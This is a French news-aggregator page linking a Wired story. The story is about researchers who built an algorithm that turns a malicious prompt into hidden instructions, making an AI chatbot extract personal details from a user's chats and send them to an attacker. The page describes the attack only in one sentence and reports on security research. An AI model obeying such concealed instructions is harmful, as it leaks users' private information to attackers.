Navigation
Recherche
|
This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats
jeudi 17 octobre 2024, 12:30 , par Wired: Cult of Mac
Security researchers created an algorithm that turns a malicious prompt into a set of hidden instructions that could send a user's personal information to an attacker.
https://www.wired.com/story/ai-imprompter-malware-llm/
Voir aussi |
59 sources (15 en français)
Date Actuelle
jeu. 21 nov. - 16:15 CET
|